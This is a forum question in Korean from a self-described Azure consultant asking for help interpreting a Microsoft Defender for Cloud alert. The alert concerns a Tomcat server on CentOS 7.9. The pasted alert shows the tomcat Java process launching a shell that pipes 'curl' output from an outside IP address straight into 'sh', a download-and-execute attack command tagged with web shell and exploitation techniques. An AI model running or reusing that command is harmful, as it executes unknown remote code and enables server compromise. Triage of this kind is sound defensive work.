저는 Azure 컨설턴트이며 CentOS Linux용 Microsoft Defender Cloud "네트워크 서비스에서 실행되는 의심스러운 프로세스" 경고를 받았습니다.
환경: CentOS Linux 7.9.0에서 실행되는 Tomcat Apache
Defender 경고 세부 정보는 다음과 같습니다.
1/6/2024 9:11:14 PM
[7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM
[7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt
Referenced in commandline 222.108.161.27
1/6/2024 9:11:14 PM
bash was executed by a network service 'java'
Script content cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Suspicious process executed by a network service New Detected High
위의 경고 세부정보를 이해하는 데 도움이 필요합니다. 이 프로세스가 CentOS 내부에서 진행되고 있습니까, 아니면 의심스러운 활동입니까?